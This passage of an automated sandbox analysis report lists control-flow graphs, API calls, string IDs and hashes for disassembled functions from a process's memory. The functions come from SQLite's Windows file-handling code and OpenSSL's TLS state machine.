                                                                                                                                                                      control_flow_graph 835 7ffdff19ef40-7ffdff19ef8c 836 7ffdff19ef91-7ffdff19f004 835->836 837 7ffdff19f006-7ffdff19f015 call 7ffdff19e980 836->837 838 7ffdff19f02b-7ffdff19f03b call 7ffdff19bfd0 836->838 843 7ffdff19f01b-7ffdff19f026 837->843 844 7ffdff19f5af-7ffdff19f5d2 call 7ffdff2bcad0 837->844 845 7ffdff19f54a-7ffdff19f54d 838->845 846 7ffdff19f041-7ffdff19f06a 838->846 843->838 849 7ffdff19f5aa 845->849 850 7ffdff19f54f-7ffdff19f556 845->850 847 7ffdff19f070-7ffdff19f085 846->847 857 7ffdff19f087-7ffdff19f093 847->857 858 7ffdff19f0c2-7ffdff19f0cc 847->858 849->844 852 7ffdff19f558-7ffdff19f562 850->852 853 7ffdff19f5a1 850->853 855 7ffdff19f56a-7ffdff19f597 852->855 856 7ffdff19f564 852->856 853->849 855->849 871 7ffdff19f599-7ffdff19f59f 855->871 856->855 859 7ffdff19f0d6-7ffdff19f0f1 857->859 870 7ffdff19f095-7ffdff19f09b 857->870 858->859 860 7ffdff19f0ce-7ffdff19f0d0 858->860 863 7ffdff19f0f9-7ffdff19f102 859->863 864 7ffdff19f0f3-7ffdff19f0f7 859->864 860->859 862 7ffdff19f318-7ffdff19f31f 860->862 867 7ffdff19f36a 862->867 868 7ffdff19f321-7ffdff19f32b 862->868 869 7ffdff19f105-7ffdff19f119 call 7ffdff251c90 863->869 864->869 879 7ffdff19f373 867->879 872 7ffdff19f32d 868->872 873 7ffdff19f333-7ffdff19f360 868->873 884 7ffdff19f136 869->884 885 7ffdff19f11b-7ffdff19f134 call 7ffdff20a9f0 869->885 875 7ffdff19f09d-7ffdff19f0a1 870->875 876 7ffdff19f0a3-7ffdff19f0a6 870->876 871->849 872->873 881 7ffdff19f37a-7ffdff19f37d 873->881 900 7ffdff19f362-7ffdff19f368 873->900 875->876 878 7ffdff19f0af-7ffdff19f0c0 875->878 877 7ffdff19f0a8-7ffdff19f0ad 876->877 876->878 877->859 877->878 878->847 879->881 887 7ffdff19f3db-7ffdff19f3e0 881->887 888 7ffdff19f37f-7ffdff19f386 881->888 886 7ffdff19f138-7ffdff19f15a 884->886 885->886 891 7ffdff19f160-7ffdff19f187 CreateFileW 886->891 887->844 892 7ffdff19f388-7ffdff19f38b 888->892 893 7ffdff19f3d2 888->893 896 7ffdff19f18d-7ffdff19f18f 891->896 897 7ffdff19f230 891->897 898 7ffdff19f38d 892->898 899 7ffdff19f393-7ffdff19f3c0 892->899 893->887 901 7ffdff19f1df-7ffdff19f1ec 896->901 902 7ffdff19f191-7ffdff19f1a3 896->902 903 7ffdff19f234-7ffdff19f237 897->903 898->899 899->887 928 7ffdff19f3c2-7ffdff19f3cd 899->928 900->879 915 7ffdff19f22c-7ffdff19f22e 901->915 916 7ffdff19f1ee-7ffdff19f1f4 901->916 904 7ffdff19f1a5 902->904 905 7ffdff19f1a7-7ffdff19f1cd call 7ffdff19f7a0 902->905 907 7ffdff19f267-7ffdff19f26b 903->907 908 7ffdff19f239-7ffdff19f262 call 7ffdff198e10 903->908 904->905 926 7ffdff19f1cf 905->926 927 7ffdff19f1d1-7ffdff19f1d3 905->927 913 7ffdff19f41f-7ffdff19f42d 907->913 914 7ffdff19f271-7ffdff19f281 call 7ffdff195850 907->914 908->907 917 7ffdff19f43d-7ffdff19f456 call 7ffdff195850 913->917 918 7ffdff19f42f-7ffdff19f43b 913->918 929 7ffdff19f2de-7ffdff19f2e3 914->929 930 7ffdff19f283-7ffdff19f28a 914->930 915->903 923 7ffdff19f206-7ffdff19f209 916->923 924 7ffdff19f1f6-7ffdff19f204 916->924 940 7ffdff19f458-7ffdff19f45f 917->940 941 7ffdff19f4b3-7ffdff19f4b6 917->941 918->917 931 7ffdff19f212-7ffdff19f227 923->931 932 7ffdff19f20b-7ffdff19f210 923->932 924->923 924->931 926->927 934 7ffdff19f1d5-7ffdff19f1d9 927->934 935 7ffdff19f1db 927->935 928->844 936 7ffdff19f3e5-7ffdff19f41a call 7ffdff19c790 call 7ffdff250d40 929->936 937 7ffdff19f2e9-7ffdff19f2ee 929->937 938 7ffdff19f2d5 930->938 939 7ffdff19f28c-7ffdff19f296 930->939 931->891 932->915 932->931 934->897 934->935 935->901 936->844 937->936 943 7ffdff19f2f4-7ffdff19f313 937->943 938->929 945 7ffdff19f298 939->945 946 7ffdff19f29e-7ffdff19f2cb 939->946 950 7ffdff19f4aa 940->950 951 7ffdff19f461-7ffdff19f46b 940->951 948 7ffdff19f4b8-7ffdff19f4bb 941->948 949 7ffdff19f4bd 941->949 943->836 945->946 946->929 968 7ffdff19f2cd-7ffdff19f2d3 946->968 953 7ffdff19f4c4-7ffdff19f4dc 948->953 949->953 950->941 954 7ffdff19f46d 951->954 955 7ffdff19f473-7ffdff19f4a0 951->955 958 7ffdff19f4de 953->958 959 7ffdff19f4e2-7ffdff19f4ea 953->959 954->955 955->941 971 7ffdff19f4a2-7ffdff19f4a8 955->971 958->959 962 7ffdff19f4ec-7ffdff19f500 call 7ffdff251c90 959->962 963 7ffdff19f522-7ffdff19f548 959->963 969 7ffdff19f51e 962->969 970 7ffdff19f502-7ffdff19f51c call 7ffdff20a9f0 962->970 963->844 968->929 969->963 970->963 970->969 971->941
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007A4519$CreateFile
                                                                                                                                                                      • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                      • API String ID: 1717138855-3829269058
                                                                                                                                                                      • Opcode ID: 3bf394784fb49c126f92dae6b034876b463d8c9389f1d231e195629b2493f58d
                                                                                                                                                                      • Instruction ID: 9d94bc8dbcd7c9dffaf1f634c620e18a86a161e87e4852b826360c4999128fac
                                                                                                                                                                      • Opcode Fuzzy Hash: 3bf394784fb49c126f92dae6b034876b463d8c9389f1d231e195629b2493f58d
                                                                                                                                                                      • Instruction Fuzzy Hash: B4025C26F0964286FB648F21A864B7963A0FF84B58F140335DE7E866E8DF3CE585C740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFDFF1A90D0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 176COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1443 7ffdff1a90d0-7ffdff1a90f0 1444 7ffdff1a9125-7ffdff1a914c 1443->1444 1445 7ffdff1a90f2-7ffdff1a9120 call 7ffdff198e10 1443->1445 1450 7ffdff1a9200-7ffdff1a920f 1444->1450 1451 7ffdff1a9152-7ffdff1a9161 1444->1451 1449 7ffdff1a9349-7ffdff1a935c 1445->1449 1452 7ffdff1a9220-7ffdff1a9224 1450->1452 1453 7ffdff1a9211-7ffdff1a921e call 7ffdff1a2de0 1450->1453 1454 7ffdff1a9167-7ffdff1a9174 1451->1454 1455 7ffdff1a91f8-7ffdff1a91fb 1451->1455 1458 7ffdff1a9228-7ffdff1a9234 1452->1458 1453->1458 1470 7ffdff1a9176-7ffdff1a917d 1454->1470 1471 7ffdff1a91d0-7ffdff1a91ed 1454->1471 1456 7ffdff1a9282-7ffdff1a928e 1455->1456 1459 7ffdff1a9298-7ffdff1a92a1 1456->1459 1460 7ffdff1a9290-7ffdff1a9293 call 7ffdff1a6150 1456->1460 1462 7ffdff1a9246-7ffdff1a924c 1458->1462 1463 7ffdff1a9236-7ffdff1a9239 1458->1463 1466 7ffdff1a933f-7ffdff1a9344 1459->1466 1460->1459 1468 7ffdff1a92a6-7ffdff1a92b2 1462->1468 1469 7ffdff1a924e-7ffdff1a9275 call 7ffdff198e10 1462->1469 1463->1462 1467 7ffdff1a923b-7ffdff1a9241 1463->1467 1466->1449 1476 7ffdff1a933d 1467->1476 1474 7ffdff1a92d4-7ffdff1a92da 1468->1474 1475 7ffdff1a92b4-7ffdff1a92b7 1468->1475 1484 7ffdff1a927a-7ffdff1a927d call 7ffdff1a2f00 1469->1484 1472 7ffdff1a9196-7ffdff1a919d 1470->1472 1473 7ffdff1a917f 1470->1473 1471->1456 1488 7ffdff1a91f3-7ffdff1a91f6 1471->1488 1479 7ffdff1a91ba-7ffdff1a91c5 1472->1479 1480 7ffdff1a919f-7ffdff1a91a6 1472->1480 1478 7ffdff1a9180-7ffdff1a9185 1473->1478 1482 7ffdff1a92dc-7ffdff1a92e4 1474->1482 1483 7ffdff1a92f0-7ffdff1a92f3 1474->1483 1475->1474 1481 7ffdff1a92b9-7ffdff1a92bc 1475->1481 1476->1466 1489 7ffdff1a9187-7ffdff1a918b 1478->1489 1490 7ffdff1a918d-7ffdff1a9194 1478->1490 1479->1471 1505 7ffdff1a91c7-7ffdff1a91ca 1479->1505 1480->1471 1491 7ffdff1a91a8-7ffdff1a91ad 1480->1491 1481->1474 1492 7ffdff1a92be-7ffdff1a92c7 call 7ffdff1a6d90 1481->1492 1482->1484 1493 7ffdff1a92e6-7ffdff1a92ee call 7ffdff1a2e40 1482->1493 1486 7ffdff1a92f5-7ffdff1a92ff 1483->1486 1487 7ffdff1a932b-7ffdff1a9338 00007FFE1A4519C0 1483->1487 1484->1456 1495 7ffdff1a9303-7ffdff1a9306 1486->1495 1496 7ffdff1a9301 1486->1496 1487->1476 1488->1450 1488->1455 1489->1472 1489->1490 1490->1472 1490->1478 1491->1479 1497 7ffdff1a91af-7ffdff1a91b6 1491->1497 1504 7ffdff1a92cc-7ffdff1a92d0 1492->1504 1493->1456 1501 7ffdff1a9308-7ffdff1a930e call 7ffdff1a2320 1495->1501 1502 7ffdff1a9313-7ffdff1a9327 call 7ffdff1a5850 1495->1502 1496->1495 1497->1491 1503 7ffdff1a91b8 1497->1503 1501->1502 1502->1487 1511 7ffdff1a9329 1502->1511 1503->1471 1504->1476 1509 7ffdff1a92d2 1504->1509 1505->1456 1505->1471 1509->1484 1511->1487
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                                                                                                                                      • API String ID: 0-3764764234
                                                                                                                                                                      • Opcode ID: a575294e85077e3cd45ec191bb9800bea06e703a172f2da4913369db34031028
                                                                                                                                                                      • Instruction ID: 83b64a248f6502b11b9f30a33c9a2118e7c6c6c085dd9ebc998d54e1f0daf850
                                                                                                                                                                      • Opcode Fuzzy Hash: a575294e85077e3cd45ec191bb9800bea06e703a172f2da4913369db34031028
                                                                                                                                                                      • Instruction Fuzzy Hash: D9713E23F0864681FB659F15D464B7963A1EF94B94F944236CA7D8B6EDDF3CE8818300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFDFF19C960 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 110fileCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1512 7ffdff19c960-7ffdff19c98b 1513 7ffdff19c9db-7ffdff19c9ff 1512->1513 1514 7ffdff19c98d-7ffdff19c9a2 1512->1514 1517 7ffdff19ca04-7ffdff19ca28 ReadFile 1513->1517 1515 7ffdff19c9c4-7ffdff19c9d8 call 7ffdff2bda84 1514->1515 1516 7ffdff19c9a4 call 7ffdff2bda84 1514->1516 1515->1513 1524 7ffdff19c9a9 1516->1524 1518 7ffdff19ca9a-7ffdff19ca9c 1517->1518 1519 7ffdff19ca2a-7ffdff19ca33 1517->1519 1522 7ffdff19caca-7ffdff19cad3 1518->1522 1523 7ffdff19ca9e-7ffdff19cac5 call 7ffdff198e10 1518->1523 1519->1518 1530 7ffdff19ca35-7ffdff19ca43 1519->1530 1522->1524 1528 7ffdff19cad9-7ffdff19caee 00007FFE1A4519C0 1522->1528 1523->1522 1529 7ffdff19c9ab-7ffdff19c9c3 1524->1529 1528->1529 1532 7ffdff19ca45-7ffdff19ca4b 1530->1532 1533 7ffdff19ca74-7ffdff19ca95 call 7ffdff19c790 1530->1533 1534 7ffdff19ca4d-7ffdff19ca51 1532->1534 1535 7ffdff19ca53-7ffdff19ca56 1532->1535 1533->1529 1534->1535 1537 7ffdff19ca60-7ffdff19ca72 1534->1537 1535->1537 1538 7ffdff19ca58-7ffdff19ca5e 1535->1538 1537->1517 1538->1533 1538->1537
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007A4519FileRead
                                                                                                                                                                      • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                      • API String ID: 857436965-1843600136
                                                                                                                                                                      • Opcode ID: 741b0e31e271a6a920d8f7a77574a081f4792607e0774ba0d9e6d6aca4af2089
                                                                                                                                                                      • Instruction ID: fa3a2c10a27eaa19f6912ce141e9dd6ee1de54b66d45f450cf54dba03f2b962f
                                                                                                                                                                      • Opcode Fuzzy Hash: 741b0e31e271a6a920d8f7a77574a081f4792607e0774ba0d9e6d6aca4af2089
                                                                                                                                                                      • Instruction Fuzzy Hash: 8841E233F08A4386E720DF15E4649A97365FB44784F544236EABE876E8EF3CE5468780
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFE003114BF Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 243COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1729 7ffe003114bf-7ffe0036ed94 call 7ffe0031132a * 2 1736 7ffe0036f0ea-7ffe0036f104 1729->1736 1737 7ffe0036ed9a-7ffe0036edb1 call 7ffe0038ce5b SetLastError 1729->1737 1740 7ffe0036edb3-7ffe0036edba 1737->1740 1741 7ffe0036edc1-7ffe0036edc8 1737->1741 1740->1741 1742 7ffe0036edca-7ffe0036edce 1741->1742 1743 7ffe0036edd6-7ffe0036ede0 1741->1743 1744 7ffe0036edf2-7ffe0036edf7 1742->1744 1745 7ffe0036edd0-7ffe0036edd4 1742->1745 1743->1744 1746 7ffe0036ede2-7ffe0036edec call 7ffe0031192e 1743->1746 1748 7ffe0036ee03 1744->1748 1749 7ffe0036edf9-7ffe0036edfc 1744->1749 1745->1743 1745->1744 1746->1736 1746->1744 1750 7ffe0036ee07-7ffe0036ee0e 1748->1750 1749->1750 1752 7ffe0036edfe 1749->1752 1753 7ffe0036ee10-7ffe0036ee17 1750->1753 1754 7ffe0036ee51-7ffe0036ee66 1750->1754 1755 7ffe0036eff3 1752->1755 1757 7ffe0036ee43-7ffe0036ee4b 1753->1757 1758 7ffe0036ee19-7ffe0036ee20 1753->1758 1759 7ffe0036eeb5-7ffe0036eebf 1754->1759 1760 7ffe0036ee68-7ffe0036ee72 1754->1760 1756 7ffe0036eff7-7ffe0036effa 1755->1756 1761 7ffe0036effc-7ffe0036efff call 7ffe0036e8a0 1756->1761 1762 7ffe0036f019-7ffe0036f01c 1756->1762 1757->1754 1758->1757 1763 7ffe0036ee22-7ffe0036ee31 1758->1763 1764 7ffe0036eec1-7ffe0036eecb call 7ffe0038cd9b 1759->1764 1765 7ffe0036eecd-7ffe0036eee3 call 7ffe003120d6 1759->1765 1760->1765 1766 7ffe0036ee74-7ffe0036ee77 1760->1766 1776 7ffe0036f004-7ffe0036f007 1761->1776 1770 7ffe0036f055-7ffe0036f059 1762->1770 1771 7ffe0036f01e-7ffe0036f021 call 7ffe0036f2d0 1762->1771 1763->1757 1772 7ffe0036ee33-7ffe0036ee3a 1763->1772 1791 7ffe0036ee8a-7ffe0036eeb0 call 7ffe0038cda1 call 7ffe00311d93 1764->1791 1783 7ffe0036eee5-7ffe0036eeef call 7ffe0038cd9b 1765->1783 1784 7ffe0036eef1-7ffe0036eef8 1765->1784 1767 7ffe0036ee80-7ffe0036ee85 call 7ffe0038cd9b 1766->1767 1768 7ffe0036ee79-7ffe0036ee7e 1766->1768 1767->1791 1768->1765 1768->1767 1779 7ffe0036f060-7ffe0036f08d call 7ffe0038cd9b call 7ffe0038cda1 call 7ffe00311d93 1770->1779 1780 7ffe0036f05b-7ffe0036f05e 1770->1780 1788 7ffe0036f026-7ffe0036f029 1771->1788 1772->1757 1778 7ffe0036ee3c-7ffe0036ee41 1772->1778 1786 7ffe0036f0c0 1776->1786 1787 7ffe0036f00d-7ffe0036f017 1776->1787 1778->1754 1778->1757 1789 7ffe0036f092-7ffe0036f0b7 call 7ffe0038cd9b call 7ffe0038cda1 1779->1789 1780->1779 1780->1789 1783->1791 1794 7ffe0036ef3e-7ffe0036ef41 call 7ffe00312086 1784->1794 1795 7ffe0036eefa-7ffe0036ef05 call 7ffe0038d85d 1784->1795 1800 7ffe0036f0c3-7ffe0036f0d1 call 7ffe0038d2c3 1786->1800 1796 7ffe0036f048-7ffe0036f04e 1787->1796 1797 7ffe0036f02b-7ffe0036f036 1788->1797 1798 7ffe0036f038-7ffe0036f03b 1788->1798 1789->1786 1826 7ffe0036f0bb call 7ffe0038cda7 1789->1826 1791->1800 1812 7ffe0036ef46-7ffe0036ef48 1794->1812 1821 7ffe0036ef16-7ffe0036ef26 call 7ffe0038cd95 1795->1821 1822 7ffe0036ef07-7ffe0036ef11 call 7ffe0038cd9b 1795->1822 1796->1756 1806 7ffe0036f050-7ffe0036f053 1796->1806 1797->1796 1798->1786 1808 7ffe0036f041 1798->1808 1800->1736 1824 7ffe0036f0d3-7ffe0036f0e1 1800->1824 1806->1786 1808->1796 1818 7ffe0036ef7f-7ffe0036ef97 call 7ffe00311fff 1812->1818 1819 7ffe0036ef4a-7ffe0036ef4f call 7ffe0038cd9b 1812->1819 1839 7ffe0036efa5-7ffe0036efa9 1818->1839 1840 7ffe0036ef99-7ffe0036efa3 call 7ffe0038cd9b 1818->1840 1836 7ffe0036ef54-7ffe0036ef7a call 7ffe0038cda1 call 7ffe00311d93 1819->1836 1837 7ffe0036ef28-7ffe0036ef32 call 7ffe0038cd9b 1821->1837 1838 7ffe0036ef37 1821->1838 1822->1791 1829 7ffe0036f0e3 1824->1829 1830 7ffe0036f0e8 1824->1830 1826->1786 1829->1830 1830->1736 1836->1786 1837->1791 1838->1794 1842 7ffe0036efb1-7ffe0036efb8 1839->1842 1843 7ffe0036efab-7ffe0036efaf 1839->1843 1840->1836 1847 7ffe0036efba-7ffe0036efc7 call 7ffe0031186b 1842->1847 1848 7ffe0036efe6-7ffe0036efee 1842->1848 1843->1842 1843->1847 1847->1800 1855 7ffe0036efcd-7ffe0036efd4 1847->1855 1848->1755 1856 7ffe0036efdf 1855->1856 1857 7ffe0036efd6-7ffe0036efdd 1855->1857 1856->1848 1857->1848 1857->1856
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                      • String ID: ..\s\ssl\statem\statem.c$state_machine
                                                                                                                                                                      • API String ID: 1452528299-1722249466
                                                                                                                                                                      • Opcode ID: 236d5f13ad3ad80265c17443c4d34d4b4270ad271146e1380b34927adae8de7c
                                                                                                                                                                      • Instruction ID: a5f6cd55039a290be86357726a6298dd4048268b8e7174718c827c33611df773
                                                                                                                                                                      • Opcode Fuzzy Hash: 236d5f13ad3ad80265c17443c4d34d4b4270ad271146e1380b34927adae8de7c
                                                                                                                                                                      • Instruction Fuzzy Hash: 43A18B36A1C64386FBA2AB2594407BD2391EF41B44F189432DB0D4A7EEDE3DE889C751
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFE00311280 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1858 7ffe00311280-7ffe00358a4f call 7ffe0031132a 1862 7ffe00358a55-7ffe00358a5c 1858->1862 1863 7ffe00358b9b-7ffe00358bd0 call 7ffe0038cd9b call 7ffe0038cda1 call 7ffe00311d93 1858->1863 1865 7ffe00358a5e-7ffe00358a65 1862->1865 1866 7ffe00358a6b-7ffe00358a71 1862->1866 1881 7ffe00358b0d-7ffe00358b22 1863->1881 1865->1863 1865->1866 1866->1863 1867 7ffe00358a77-7ffe00358a7c 1866->1867 1869 7ffe00358a83-7ffe00358a89 1867->1869 1871 7ffe00358a9e-7ffe00358aad SetLastError 1869->1871 1872 7ffe00358a8b-7ffe00358a98 1869->1872 1875 7ffe00358ab3-7ffe00358ac5 call 7ffe0038cdf5 1871->1875 1876 7ffe00358b3f-7ffe00358b6f call 7ffe0038cd9b call 7ffe0038cda1 call 7ffe00311d93 1871->1876 1872->1871 1874 7ffe00358b33-7ffe00358b3a 1872->1874 1874->1869 1883 7ffe00358aca-7ffe00358acf 1875->1883 1890 7ffe00358b74-7ffe00358b83 1876->1890 1885 7ffe00358b25 1883->1885 1886 7ffe00358ad1-7ffe00358ad7 1883->1886 1885->1890 1891 7ffe00358b27-7ffe00358b2e 1885->1891 1888 7ffe00358b23 1886->1888 1889 7ffe00358ad9-7ffe00358aeb 1886->1889 1888->1885 1889->1872 1895 7ffe00358aed-7ffe00358b05 1889->1895 1893 7ffe00358b85-7ffe00358b8c 1890->1893 1894 7ffe00358b94-7ffe00358b96 1890->1894 1891->1869 1893->1894 1897 7ffe00358b08 1894->1897 1895->1897 1897->1881
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                      • String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_write_pending
                                                                                                                                                                      • API String ID: 1452528299-1219543453
                                                                                                                                                                      • Opcode ID: 8ff6d7c4a1065a002e41a899ab5f23d3f91aa12a6731b666a508fe08045d8b83
                                                                                                                                                                      • Instruction ID: da3ab4d352aa00ec149d68862ca6aebc3afaf17bb71f3dcbc162f85e81a628b0
                                                                                                                                                                      • Opcode Fuzzy Hash: 8ff6d7c4a1065a002e41a899ab5f23d3f91aa12a6731b666a508fe08045d8b83
                                                                                                                                                                      • Instruction Fuzzy Hash: D3418A72A08B4692EB62DF29D4846B873A4FB44B84F544132EB4D13BB9DF7DE466C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFE0036EC4C Relevance: 1.6, APIs: 1, Instructions: 337COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmpDownload File
